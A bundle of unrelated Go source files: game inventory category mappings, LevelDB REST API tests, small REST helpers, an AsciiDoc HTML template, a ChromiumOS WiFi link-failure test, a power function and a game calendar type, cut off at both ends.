	CategoryFirearm                  = "firearm"
	CategoryFood                     = "food"
	CategoryGrenade                  = "grenade"
	CategoryHeadphone                = "headphone"
	CategoryKey                      = "key"
	CategoryMagazine                 = "magazine"
	CategoryMap                      = "map"
	CategoryMedical                  = "medical"
	CategoryMelee                    = "melee"
	CategoryModification             = "mod-other"
	CategoryModificationBarrel       = "barrel"
	CategoryModificationBipod        = "bipod"
	CategoryModificationCharge       = "charge"
	CategoryModificationDevice       = "device"
	CategoryModificationForegrip     = "foregrip"
	CategoryModificationGasblock     = "gasblock"
	CategoryModificationGoggles      = "goggles"
	CategoryModificationHandguard    = "handguard"
	CategoryModificationLauncher     = "launcher"
	CategoryModificationMount        = "mount"
	CategoryModificationMuzzle       = "muzzle"
	CategoryModificationPistolgrip   = "pistolgrip"
	CategoryModificationReceiver     = "receiver"
	CategoryModificationSight        = "sight"
	CategoryModificationSightSpecial = "sight-special"
	CategoryModificationStock        = "stock"
	CategoryMoney                    = "money"
	CategoryTacticalrig              = "tacticalrig"
)
// categoryKind maps every category identifier to its Kind.
var categoryKind = map[string]Kind{
	CategoryAmmunition:               KindAmmunition,
	CategoryArmor:                    KindArmor,
	CategoryBackpack:                 KindBackpack,
	CategoryBarter:                   KindBarter,
	CategoryClothing:                 KindClothing,
	CategoryCommon:                   KindCommon,
	CategoryContainer:                KindContainer,
	CategoryFirearm:                  KindFirearm,
	CategoryFood:                     KindFood,
	CategoryGrenade:                  KindGrenade,
	CategoryHeadphone:                KindHeadphone,
	CategoryKey:                      KindKey,
	CategoryMagazine:                 KindMagazine,
	CategoryMap:                      KindMap,
	CategoryMedical:                  KindMedical,
	CategoryMelee:                    KindMelee,
	CategoryModification:             KindModification,
	CategoryModificationBarrel:       KindModificationBarrel,
	CategoryModificationBipod:        KindModificationBipod,
	CategoryModificationCharge:       KindModificationCharge,
	CategoryModificationDevice:       KindModificationDevice,
	CategoryModificationForegrip:     KindModificationForegrip,
	CategoryModificationGasblock:     KindModificationGasblock,
	CategoryModificationGoggles:      KindModificationGoggles,
	CategoryModificationHandguard:    KindModificationHandguard,
	CategoryModificationLauncher:     KindModificationLauncher,
	CategoryModificationMount:        KindModificationMount,
	CategoryModificationMuzzle:       KindModificationMuzzle,
	CategoryModificationPistolgrip:   KindModificationPistolgrip,
	CategoryModificationReceiver:     KindModificationReceiver,
	CategoryModificationSight:        KindModificationSight,
	CategoryModificationSightSpecial: KindModificationSightSpecial,
	CategoryModificationStock:        KindModificationStock,
	CategoryMoney:                    KindMoney,
	CategoryTacticalrig:              KindTacticalrig,
}

// CategoryToKind resolves a category identifier to its Kind.
// It returns the zero Kind and ErrInvalidCategory for an unknown
// category string.
func CategoryToKind(s string) (Kind, error) {
	k, ok := categoryKind[s]
	if !ok {
		return k, ErrInvalidCategory
	}
	return k, nil
}
// kindCategory maps every Kind back to its category identifier; it is
// the inverse of the mapping used by CategoryToKind.
var kindCategory = map[Kind]string{
	KindAmmunition:               CategoryAmmunition,
	KindArmor:                    CategoryArmor,
	KindBackpack:                 CategoryBackpack,
	KindBarter:                   CategoryBarter,
	KindClothing:                 CategoryClothing,
	KindCommon:                   CategoryCommon,
	KindContainer:                CategoryContainer,
	KindFirearm:                  CategoryFirearm,
	KindFood:                     CategoryFood,
	KindGrenade:                  CategoryGrenade,
	KindHeadphone:                CategoryHeadphone,
	KindKey:                      CategoryKey,
	KindMagazine:                 CategoryMagazine,
	KindMap:                      CategoryMap,
	KindMedical:                  CategoryMedical,
	KindMelee:                    CategoryMelee,
	KindModification:             CategoryModification,
	KindModificationBarrel:       CategoryModificationBarrel,
	KindModificationBipod:        CategoryModificationBipod,
	KindModificationCharge:       CategoryModificationCharge,
	KindModificationDevice:       CategoryModificationDevice,
	KindModificationForegrip:     CategoryModificationForegrip,
	KindModificationGasblock:     CategoryModificationGasblock,
	KindModificationGoggles:      CategoryModificationGoggles,
	KindModificationHandguard:    CategoryModificationHandguard,
	KindModificationLauncher:     CategoryModificationLauncher,
	KindModificationMount:        CategoryModificationMount,
	KindModificationMuzzle:       CategoryModificationMuzzle,
	KindModificationPistolgrip:   CategoryModificationPistolgrip,
	KindModificationReceiver:     CategoryModificationReceiver,
	KindModificationSight:        CategoryModificationSight,
	KindModificationSightSpecial: CategoryModificationSightSpecial,
	KindModificationStock:        CategoryModificationStock,
	KindMoney:                    CategoryMoney,
	KindTacticalrig:              CategoryTacticalrig,
}

// KindToCategory resolves a Kind to its category identifier.
// It returns an empty string and ErrInvalidKind for an unknown Kind.
func KindToCategory(k Kind) (string, error) {
	c, ok := kindCategory[k]
	if !ok {
		return c, ErrInvalidKind
	}
	return c, nil
}
// categoryDisplayName maps category identifiers to human-readable
// names.  Most names equal the identifier; a few are expanded
// (e.g. "charge" -> "charging handle").
var categoryDisplayName = map[string]string{
	CategoryAmmunition:               "ammunition",
	CategoryArmor:                    "armor",
	CategoryBackpack:                 "backpack",
	CategoryBarter:                   "barter",
	CategoryClothing:                 "clothing",
	CategoryCommon:                   "common",
	CategoryContainer:                "container",
	CategoryFirearm:                  "firearm",
	CategoryFood:                     "food",
	CategoryGrenade:                  "grenade",
	CategoryHeadphone:                "headphone",
	CategoryKey:                      "key",
	CategoryMagazine:                 "magazine",
	CategoryMap:                      "map",
	CategoryMedical:                  "medical",
	CategoryMelee:                    "melee",
	CategoryModification:             "modification other",
	CategoryModificationBarrel:       "barrel",
	CategoryModificationBipod:        "bipod",
	CategoryModificationCharge:       "charging handle",
	CategoryModificationDevice:       "device",
	CategoryModificationForegrip:     "foregrip",
	CategoryModificationGasblock:     "gas block",
	CategoryModificationGoggles:      "goggles",
	CategoryModificationHandguard:    "handguard",
	CategoryModificationLauncher:     "launcher",
	CategoryModificationMount:        "mount",
	CategoryModificationMuzzle:       "muzzle",
	CategoryModificationPistolgrip:   "pistol grip",
	CategoryModificationReceiver:     "receiver",
	CategoryModificationSight:        "sight",
	CategoryModificationSightSpecial: "special sight",
	CategoryModificationStock:        "stock",
	CategoryMoney:                    "money",
	CategoryTacticalrig:              "tactical rig",
}

// CategoryToDisplayName resolves a category identifier to its
// human-readable display name.  It returns an empty string and
// ErrInvalidCategory for an unknown category.
func CategoryToDisplayName(s string) (string, error) {
	c, ok := categoryDisplayName[s]
	if !ok {
		return c, ErrInvalidCategory
	}
	return c, nil
}
|
package libldbrest
import (
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httptest"
"os"
"strings"
"testing"
"github.com/syndtr/goleveldb/leveldb"
"github.com/syndtr/goleveldb/leveldb/opt"
"github.com/ugorji/go/codec"
)
// TestMultiGet verifies that POST /keys returns every stored key that
// was requested.
func TestMultiGet(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)

	app := newAppTester(t)
	keys := []string{"1", "2"}
	for _, k := range keys {
		app.put(k, k)
	}

	itemMap := app.multiGet(keys)
	if got, want := len(itemMap), len(keys); got != want {
		t.Fatalf("Expected len(itemMap) to be %d, got %d\n", want, got)
	}
	for _, k := range keys {
		if itemMap[k] != k {
			t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k, k, itemMap[k])
		}
	}
}
// TestMultiGetMissingKey verifies that POST /keys silently omits keys
// that are not in the database instead of failing the whole request.
func TestMultiGetMissingKey(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)

	app := newAppTester(t)
	stored := []string{"1", "2"}
	for _, k := range stored {
		app.put(k, k)
	}
	kMissing := "3"

	itemMap := app.multiGet([]string{stored[0], stored[1], kMissing})
	if got, want := len(itemMap), len(stored); got != want {
		t.Fatalf("Expected len(itemMap) to be %d, got %d\n", want, got)
	}
	for _, k := range stored {
		if itemMap[k] != k {
			t.Fatalf("Expected itemMap[%s] to be '%s', got '%s'\n", k, k, itemMap[k])
		}
	}
	if val, ok := itemMap[kMissing]; ok {
		t.Fatalf("Expected itemMap[%s] to not exist, got '%s'\n", kMissing, val)
	}
}
// TestKeyPutGet verifies the basic single-key round trip: a stored
// value can be read back and an absent key is reported as not found.
func TestKeyPutGet(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)

	app := newAppTester(t)
	app.put("foo", "bar")
	if val := app.get("foo"); val != "bar" {
		t.Fatalf("wrong 'foo' value: %s", val)
	}
	if found, _ := app.maybeGet("baz"); found {
		t.Fatal("found 'baz' when we shouldn't have")
	}
}
// TestDelete verifies DELETE /key/<k> removes a key and that deleting
// an absent key still succeeds (delete is idempotent).
func TestDelete(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)

	app := newAppTester(t)
	app.put("a", "A")

	if !app.del("a") {
		t.Fatal("failed to DELETE existing key")
	}
	if !app.del("b") {
		t.Fatal("failed to DELETE non-existing key")
	}
	if found, _ := app.maybeGet("a"); found {
		t.Fatal("DELETE didn't remove a key")
	}
}
// TestIteration exercises GET /iterate: forward and reverse scans,
// inclusive/exclusive bounds, the max limit and the 'more' flag.
func TestIteration(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)
	app := newAppTester(t)
	// seed four ordered keys to scan over
	app.put("a", "A")
	app.put("b", "B")
	app.put("c", "C")
	app.put("d", "D")
	/*
		[b, d) — keys only, start inclusive, end exclusive
	*/
	rr := app.doReq("GET", "http://domain/iterate?start=b&include_start=yes&end=d", "")
	if rr.Code != 200 {
		t.Fatalf("bad GET /iterate response: %d", rr.Code)
	}
	kresp := &multiResponse{}
	if err := codec.NewDecoder(rr.Body, msgpack).Decode(kresp); err != nil {
		t.Fatal(err)
	}
	assert(t, len(kresp.Data) == 2, "wrong # of returned keys: %d", len(kresp.Data))
	assert(t, kresp.Data[0].Key == "b", "wrong returned key: %s", kresp.Data[0])
	assert(t, kresp.Data[1].Key == "c", "wrong returned key: %s", kresp.Data[1])
	assert(t, !*kresp.More, "ldbrest falsely reporting 'more'")
	/*
		keys and vals [0, 2) — no bounds, limited by max
	*/
	rr = app.doReq("GET", "http://domain/iterate?max=2", "")
	if rr.Code != 200 {
		t.Fatalf("bad GET /iterate response: %d", rr.Code)
	}
	kvresp := &multiResponse{}
	if err := codec.NewDecoder(rr.Body, msgpack).Decode(kvresp); err != nil {
		t.Fatal(err)
	}
	assert(t, len(kvresp.Data) == 2, "wrong # of keyvals: %d", len(kvresp.Data))
	assert(t, kvresp.Data[0].Key == "a", "wrong first key: %s", kvresp.Data[0].Key)
	assert(t, kvresp.Data[0].Value == "A", "wrong first value: %s", kvresp.Data[0].Value)
	assert(t, kvresp.Data[1].Key == "b", "wrong second key: %s", kvresp.Data[1].Key)
	assert(t, kvresp.Data[1].Value == "B", "wrong second value: %s", kvresp.Data[1].Value)
	assert(t, !*kvresp.More, "ldbrest falsely reporting 'more'")
	/*
		keys and vals [a, d] with max 3 (trigger 'more')
	*/
	rr = app.doReq("GET", "http://domain/iterate?start=a&end=d&include_end=yes&max=3", "")
	if rr.Code != 200 {
		t.Fatalf("bad GET /iterate response: %d", rr.Code)
	}
	// reuse the response struct: clear the previous run's fields so
	// stale data cannot mask a decode failure
	*kvresp.More = false
	kvresp.Data = nil
	if err := codec.NewDecoder(rr.Body, msgpack).Decode(kvresp); err != nil {
		t.Fatal(err)
	}
	assert(t, len(kvresp.Data) == 3, "wrong # of keyvals: %d", len(kvresp.Data))
	assert(t, *kvresp.More, "'more' should be true")
	assert(t, kvresp.Data[0].Key == "a", "wrong data[0].Key: %s", kvresp.Data[0].Key)
	assert(t, kvresp.Data[1].Key == "b", "wrong data[1].Key: %s", kvresp.Data[1].Key)
	assert(t, kvresp.Data[2].Key == "c", "wrong data[2].Key: %s", kvresp.Data[2].Key)
	assert(t, kvresp.Data[0].Value == "A", "wrong data[0].Value: %s", kvresp.Data[0].Value)
	assert(t, kvresp.Data[1].Value == "B", "wrong data[1].Value: %s", kvresp.Data[1].Value)
	assert(t, kvresp.Data[2].Value == "C", "wrong data[2].Value: %s", kvresp.Data[2].Value)
	/*
		keys only [d, a] in reverse with max 2 (trigger 'more')
	*/
	rr = app.doReq("GET", "http://domain/iterate?start=d&forward=no&max=2&end=a&include_end=yes", "")
	if rr.Code != 200 {
		t.Fatalf("bad GET /iterate response: %d", rr.Code)
	}
	// reset before decoding the reverse-scan response
	kresp.More = nil
	kresp.Data = nil
	if err := codec.NewDecoder(rr.Body, msgpack).Decode(kresp); err != nil {
		t.Fatal(err)
	}
	assert(t, len(kresp.Data) == 2, "wrong # of keys: %d", len(kresp.Data))
	assert(t, *kresp.More, "'more' should be true (reverse)")
	assert(t, kresp.Data[0].Key == "d", "wrong data[0]: %s", kresp.Data[0])
	assert(t, kresp.Data[1].Key == "c", "wrong data[1]: %s", kresp.Data[1])
}
// TestBatch verifies that POST /batch applies puts and deletes
// atomically as a single operation list.
func TestBatch(t *testing.T) {
	dbpath := setup(t)
	defer cleanup(dbpath)

	app := newAppTester(t)
	app.put("foo", "bar")

	ops := oplist{
		{"put", "a", "A"},
		{"put", "b", "B"},
		{"delete", "foo", ""},
	}
	if !app.batch(ops) {
		t.Fatal("batch call failed")
	}
	if app.get("a") != "A" || app.get("b") != "B" {
		t.Fatal("puts in the batch didn't go through")
	}
	if found, _ := app.maybeGet("foo"); found {
		t.Fatal("delete in the batch didn't go through")
	}
}
// setup creates a fresh temporary directory and opens the
// package-level leveldb handle (db) inside it.  Callers must pair it
// with `defer cleanup(dirpath)`.
func setup(tb testing.TB) string {
	dirpath, err := ioutil.TempDir("", "ldbrest_test")
	if err != nil {
		tb.Fatal(err)
	}
	// assigns the shared package-level db used by the HTTP handlers
	db, err = leveldb.OpenFile(dirpath, &opt.Options{
		ErrorIfExist: true, // a leftover database would invalidate the test
	})
	if err != nil {
		os.RemoveAll(dirpath)
		tb.Fatal(err)
	}
	return dirpath
}
// cleanup closes the package-level database (if open) and removes the
// temporary directory created by setup.
func cleanup(path string) {
	if db != nil {
		db.Close()
	}
	os.RemoveAll(path)
}
// assert fails the test with the formatted message when cond is false.
func assert(tb testing.TB, cond bool, msg string, args ...interface{}) {
	if cond {
		return
	}
	tb.Fatalf(msg, args...)
}
// appTester drives the router in-process via httptest, failing the
// owning test on any transport-level problem.
type appTester struct {
	app http.Handler // the router under test
	tb  testing.TB   // test to fail on errors
}

// newAppTester builds an appTester around a freshly initialised
// router (empty URL prefix).
func newAppTester(tb testing.TB) *appTester {
	return &appTester{app: InitRouter(""), tb: tb}
}
// doReq performs an HTTP request against the in-memory router and
// returns the recorded response.  An empty body sends no request body.
func (app *appTester) doReq(method, url, body string) *httptest.ResponseRecorder {
	var rdr io.Reader
	if body != "" {
		rdr = strings.NewReader(body)
	}
	req, err := http.NewRequest(method, url, rdr)
	if err != nil {
		app.tb.Fatal(err)
	}
	rr := httptest.NewRecorder()
	app.app.ServeHTTP(rr, req)
	rr.Flush()
	return rr
}
// put stores key=value through POST /key and fails the test unless
// the server answers 204.
func (app *appTester) put(key, value string) {
	b := make([]byte, 0)
	err := codec.NewEncoderBytes(&b, msgpack).Encode(keyval{key, value})
	if err != nil {
		app.tb.Fatalf("failed msgpack encode")
	}
	rr := app.doReq("POST", "http://domain/key", string(b))
	if rr.Code != 204 {
		// the endpoint is POST /key; the old message claimed "PUT /key/X"
		app.tb.Fatalf("non-204 POST /key response: %d", rr.Code)
	}
}
// maybeGet fetches key via GET /key/<key>.  It returns (false, "")
// for an absent key and (true, value) for a present one; any other
// status fails the test.
func (app *appTester) maybeGet(key string) (bool, string) {
	rr := app.doReq("GET", fmt.Sprintf("http://domain/key/%s", key), "")
	switch rr.Code {
	case http.StatusNotFound:
		return false, ""
	case http.StatusOK:
		// ResponseRecorder.HeaderMap is deprecated; Result().Header is
		// the supported way to read headers written by the handler.
		ct := rr.Result().Header.Get("Content-Type")
		if ct != msgpackCType {
			app.tb.Fatalf("non 'application/msgpack' 200 GET /key/%s response: %s", key, ct)
		}
	default:
		app.tb.Fatalf("questionable GET /key/%s response: %d", key, rr.Code)
	}
	req := &keyval{}
	err := codec.NewDecoder(rr.Body, msgpack).Decode(req)
	if err != nil {
		app.tb.Fatalf("bad msgpack GET /key/%s", key)
	}
	return true, req.Value
}
// get returns the value stored under key, failing the test when the
// key does not exist.
func (app *appTester) get(key string) string {
	if found, value := app.maybeGet(key); found {
		return value
	}
	app.tb.Fatalf("failed to find key %s", key)
	return "" // unreachable: Fatalf stops the test goroutine
}
// multiGet fetches several keys at once via POST /keys and returns
// the found key/value pairs as a map; missing keys are simply absent
// from the result.
func (app *appTester) multiGet(keys []string) map[string]string {
	reqBody := map[string][]string{
		"keys": keys,
	}
	bytesOut := make([]byte, 0)
	err := codec.NewEncoderBytes(&bytesOut, msgpack).Encode(reqBody)
	if err != nil {
		app.tb.Fatalf("Error: msgpack marshal: %s\n request body was: %#v\n", err.Error(), reqBody)
	}
	rr := app.doReq("POST", "http://domain/keys", string(bytesOut))
	if rr.Code != http.StatusOK {
		// the request is a POST; the old message said "GET /keys"
		app.tb.Fatalf("questionable POST /keys, keys: %v, response: %d", keys, rr.Code)
	}
	// HeaderMap is deprecated; read recorded headers via Result().
	ct := rr.Result().Header.Get("Content-Type")
	if ct != "application/msgpack" {
		app.tb.Fatalf("non 'application/msgpack' 200 POST /keys response: %s\n keys: %v\n", ct, keys)
	}
	items := &multiResponse{}
	err = codec.NewDecoderBytes(rr.Body.Bytes(), msgpack).Decode(items)
	if err != nil {
		app.tb.Fatalf("Error: msgpack unmarshal: %s\n keys: %v\n response body: %s", err.Error(), keys, rr.Body.String())
	}
	results := map[string]string{}
	for _, kv := range items.Data {
		results[kv.Key] = kv.Value
	}
	return results
}
// del issues DELETE /key/<key> and reports whether the server
// answered 204 No Content.
func (app *appTester) del(key string) bool {
	url := fmt.Sprintf("http://domain/key/%s", key)
	return app.doReq("DELETE", url, "").Code == http.StatusNoContent
}
// batch submits an operation list to POST /batch and reports whether
// the server applied it (HTTP 204).
func (app *appTester) batch(ops oplist) bool {
	bytesOut := make([]byte, 0)
	err := codec.NewEncoderBytes(&bytesOut, msgpack).Encode(struct {
		Ops oplist `codec:"ops"`
	}{ops})
	if err != nil {
		// the payload is msgpack; the old message claimed "json ops Marshal"
		app.tb.Fatalf("msgpack ops encode: %v", err)
	}
	rr := app.doReq("POST", "http://domain/batch", string(bytesOut))
	return rr.Code == 204
}
|
/*
Copyright (c) 2014
Dario Brandes
Thies Johannsen
Paul Kröger
Sergej Mann
Roman Naumann
Sebastian Thobe
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* -*- Mode: Go; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
package uictrl
import (
"strconv"
"../../core/db"
"github.com/ant0ine/go-json-rest/rest"
)
// Api embeds the application database and is the receiver for the
// REST endpoint handlers of this package.
type Api struct {
	db.SSNDB
}

// Idable is implemented by entities that expose a numeric identifier.
type Idable interface {
	Id() int64
}

// InitDB initialises the embedded database connection.
func (api *Api) InitDB() {
	api.Init()
	// for debug purpose
	//api.LogMode(true)
}
// appendIfMissing appends element to array unless an Onion with the
// same Id is already present, returning the (possibly grown) slice.
func appendIfMissing(array []db.Onion, element db.Onion) []db.Onion {
	for i := range array {
		if array[i].Id == element.Id {
			return array
		}
	}
	return append(array, element)
}
// ToIds parses each decimal string in array into an int64.  On the
// first parse failure it returns the error together with an empty
// slice.  NOTE: the (err, values) result order is kept for
// compatibility with existing callers, although error-last is the Go
// convention.
func ToIds(array []string) (err error, intArray []int64) {
	intArray = make([]int64, len(array))
	for i, s := range array {
		var v int64
		if v, err = strconv.ParseInt(s, 10, 64); err != nil {
			return err, []int64{}
		}
		intArray[i] = v
	}
	return nil, intArray
}
// ToId parses a single decimal string into an int64, returning the
// parse error first to match this package's (err, value) convention.
func ToId(value string) (err error, id int64) {
	id, err = strconv.ParseInt(value, 10, 64)
	return err, id
}
// GetRequestedIds extracts the "ids[]" query parameters of r as int64
// values, stopping at the first malformed id and returning the ids
// collected so far together with the parse error.
func GetRequestedIds(r *rest.Request) (ids []int64, err error) {
	idMap := r.URL.Query()
	for _, queryId := range idMap["ids[]"] {
		id, err := strconv.ParseInt(queryId, 10, 64)
		if err != nil {
			return ids, err
		}
		// ParseInt already yields an int64; the previous int64(id)
		// conversion was redundant.
		ids = append(ids, id)
	}
	return
}
|
package html5
const (
	// admonitionBlockTmpl renders an admonition block (NOTE, TIP,
	// WARNING, ...) as the classic icon/content HTML5 table.
	// Template fields: ID (optional anchor), Kind (admonition class),
	// Roles (extra CSS classes), Icon, optional Title, and Content.
	admonitionBlockTmpl = `<div {{ if .ID }}id="{{ .ID}}" {{ end }}` +
		"class=\"admonitionblock {{ .Kind }}{{ if .Roles }} {{ .Roles }}{{ end }}\">\n" +
		"<table>\n" +
		"<tr>\n" +
		"<td class=\"icon\">\n{{ .Icon }}\n</td>\n" +
		"<td class=\"content\">\n" +
		"{{ if .Title }}<div class=\"title\">{{ .Title }}</div>\n{{ end }}" +
		"{{ .Content }}" +
		"</td>\n</tr>\n</table>\n</div>\n"
)
|
package main
import (
"time"
)
// cmdDTOIN is the inbound JSON payload naming a command and its
// argument string.
type cmdDTOIN struct {
	CmdName   string `json:"CmdName"`
	Arguments string `json:"Arguments"`
}

// cmdDTOOut is the outbound JSON payload describing a started
// command, including its process id and start time.
type cmdDTOOut struct {
	CmdName   string    `json:"CmdName"`
	Arguments string    `json:"Arguments"`
	PID       int       `json:"PID"`
	StartTime time.Time `json:"StartTime"`
}
// generateCmdOut builds the outbound DTO for a command, copying over
// its name, arguments, pid and starting time.
func generateCmdOut(cmd Command) cmdDTOOut {
	return cmdDTOOut{
		CmdName:   cmd.CmdName,
		Arguments: cmd.Arguments,
		PID:       cmd.PID,
		StartTime: cmd.StartingTime,
	}
}
|
// Copyright 2020 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package wifi
import (
"context"
"time"
"chromiumos/tast/ctxutil"
"chromiumos/tast/remote/network/iw"
"chromiumos/tast/remote/wificell"
"chromiumos/tast/services/cros/wifi"
"chromiumos/tast/testing"
)
// init registers the LinkMonitorFailure test with the tast framework.
func init() {
	testing.AddTest(&testing.Test{
		Func: LinkMonitorFailure,
		Desc: "Verifies how fast the DUT detects the link failure and reconnects to the AP when an AP changes its DHCP configuration",
		Contacts: []string{
			"chromeos-wifi-champs@google.com", // WiFi oncall rotation; or http://b/new?component=893827
		},
		Attr:        []string{"group:wificell", "wificell_func"},
		ServiceDeps: []string{wificell.TFServiceName},
		Fixture:     "wificellFixt",
	})
}
// LinkMonitorFailure connects the DUT to an open AP, changes the AP's
// DHCP subnet to provoke a link failure, and measures (a) how long
// the DUT takes to detect the failure and (b) how long reassociation
// then takes.
func LinkMonitorFailure(ctx context.Context, s *testing.State) {
	const (
		// Passive link monitor takes up to 25 seconds to fail; active link monitor takes up to 50 seconds to fail.
		linkFailureDetectedTimeout = 80 * time.Second
		reassociateTimeout         = 10 * time.Second
	)
	tf := s.FixtValue().(*wificell.TestFixture)
	ap, err := tf.DefaultOpenNetworkAP(ctx)
	if err != nil {
		s.Fatal("Failed to configure the AP: ", err)
	}
	defer func(ctx context.Context) {
		if err := tf.DeconfigAP(ctx, ap); err != nil {
			s.Error("Failed to deconfig the AP: ", err)
		}
	}(ctx)
	ctx, cancel := tf.ReserveForDeconfigAP(ctx, ap)
	defer cancel()
	s.Log("Test fixture setup done; connecting the DUT to the AP")
	if _, err := tf.ConnectWifiAP(ctx, ap); err != nil {
		s.Fatal("Failed to connect to WiFi: ", err)
	}
	defer func(ctx context.Context) {
		if err := tf.DisconnectWifi(ctx); err != nil {
			s.Error("Failed to disconnect WiFi: ", err)
		}
		req := &wifi.DeleteEntriesForSSIDRequest{Ssid: []byte(ap.Config().SSID)}
		if _, err := tf.WifiClient().DeleteEntriesForSSID(ctx, req); err != nil {
			s.Errorf("Failed to remove entries for ssid=%s: %v", ap.Config().SSID, err)
		}
	}(ctx)
	ctx, cancel = ctxutil.Shorten(ctx, 5*time.Second)
	defer cancel()
	s.Log("WiFi connected; starting the test")
	if err := tf.PingFromDUT(ctx, ap.ServerIP().String()); err != nil {
		s.Fatal("Failed to ping from the DUT: ", err)
	}
	ew, err := iw.NewEventWatcher(ctx, s.DUT())
	if err != nil {
		s.Fatal("Failed to create iw event watcher: ", err)
	}
	defer ew.Stop()
	// Start to change the DHCP config.
	// Obtain current time from the DUT because we use the "disconnect" event timestamp as
	// the end time of the link failure detection duration, which is from the DUT's clock.
	linkFailureTime, err := tf.WifiClient().CurrentTime(ctx)
	if err != nil {
		s.Fatal("Failed to get the current DUT time: ", err)
	}
	if err := ap.ChangeSubnetIdx(ctx); err != nil {
		s.Fatal("Failed to change the subnet index of the AP: ", err)
	}
	s.Log("Waiting for link failure detected event")
	wCtx, cancel := context.WithTimeout(ctx, linkFailureDetectedTimeout)
	defer cancel()
	linkFailureDetectedEv, err := ew.WaitByType(wCtx, iw.EventTypeDisconnect)
	if err != nil {
		s.Fatal("Failed to wait for link failure detected event: ", err)
	}
	// Calculate duration for sensing the link failure.
	linkFailureDetectedDuration := linkFailureDetectedEv.Timestamp.Sub(linkFailureTime)
	if linkFailureDetectedDuration > linkFailureDetectedTimeout {
		s.Error("Failed to detect link failure within given timeout")
	}
	s.Logf("Link failure detection time: %.2f seconds", linkFailureDetectedDuration.Seconds())
	s.Log("Waiting for reassociation to complete")
	wCtx, cancel = context.WithTimeout(ctx, reassociateTimeout)
	defer cancel()
	connectedEv, err := ew.WaitByType(wCtx, iw.EventTypeConnected)
	if err != nil {
		// Must be fatal: connectedEv is nil on error, and the
		// original s.Error continued on to dereference it below.
		s.Fatal("Failed to wait for reassociation to complete: ", err)
	}
	// Get the reassociation time.
	reassociateDuration := connectedEv.Timestamp.Sub(linkFailureDetectedEv.Timestamp)
	if reassociateDuration < 0 {
		s.Errorf("Unexpected reassociate duration: %d is negative", reassociateDuration)
	}
	if reassociateDuration > reassociateTimeout {
		s.Error("Failed to reassociate within given timeout")
	}
	s.Logf("Reassociate time: %.2f seconds", reassociateDuration.Seconds())
}
|
package main
import "fmt"
// main demonstrates myPow by printing 2**10 (1024).
func main() {
	x := 2.00000
	n := 10
	fmt.Println(myPow(x, n))
}
// myPow computes x**n for any integer exponent using fast
// exponentiation; negative exponents invert the base first.
func myPow(x float64, n int) float64 {
	if n < 0 {
		x = 1 / x
		if m := -n; m > 0 {
			n = m
		} else {
			// n is the minimum int, so -n overflowed back to n.
			// Peel off one factor and negate the now-representable
			// remainder: x^|n| == x * x^(|n|-1).
			return x * pow(x, -(n+1))
		}
	}
	return pow(x, n)
}

// pow computes x**n for n >= 0 by repeated squaring in O(log n).
func pow(x float64, n int) float64 {
	if n == 0 {
		return 1.0
	}
	half := pow(x, n/2)
	if n%2 == 1 {
		return half * half * x
	}
	return half * half
}
|
package calendar
import (
"encoding/json"
"fmt"
"io/ioutil"
"math"
"strings"
)
// Calendar tracks a position (day within season) in a fixed cycle of
// seasons loaded from a JSON definition file.  Days run 1..28 per
// season (see NextDay/PreviousDay).
type Calendar struct {
	CurrentDay    int     // day of the current season, 1..28
	CurrentSeason *Season // season currently in effect
	Seasons       []*Season `json:"seasons"`
}
// NewCalendar loads the calendar definition at pathToCalendar and
// positions it on the given day of the named season.
func NewCalendar(pathToCalendar string, day int, seasonName string) (*Calendar, error) {
	cal, err := loadCalendar(pathToCalendar)
	if err != nil {
		return nil, err
	}
	season, err := getSeasonByName(cal.Seasons, seasonName)
	if err != nil {
		return nil, err
	}
	cal.CurrentDay, cal.CurrentSeason = day, season
	return cal, nil
}
// NextDay advances the calendar by one day, rolling over to day 1 of
// the next season after day 28.  On error (unknown season) the
// calendar is left unchanged.
func (c *Calendar) NextDay() error {
	if c.CurrentDay != 28 {
		c.CurrentDay++
		return nil
	}
	nextSeason, err := getNextSeason(c.CurrentSeason, c.Seasons)
	if err != nil {
		// Look the season up before mutating: the original set
		// CurrentDay = 1 first, leaving the calendar inconsistent
		// when the lookup failed.
		return err
	}
	c.CurrentDay = 1
	c.CurrentSeason = nextSeason
	return nil
}
// PreviousDay moves the calendar back one day, rolling back to day 28
// of the previous season before day 1.  On error (unknown season) the
// calendar is left unchanged.
func (c *Calendar) PreviousDay() error {
	if c.CurrentDay != 1 {
		c.CurrentDay--
		return nil
	}
	previousSeason, err := getPreviousSeason(c.CurrentSeason, c.Seasons)
	if err != nil {
		// Look the season up before mutating: the original set
		// CurrentDay = 28 first, leaving the calendar inconsistent
		// when the lookup failed.
		return err
	}
	c.CurrentDay = 28
	c.CurrentSeason = previousSeason
	return nil
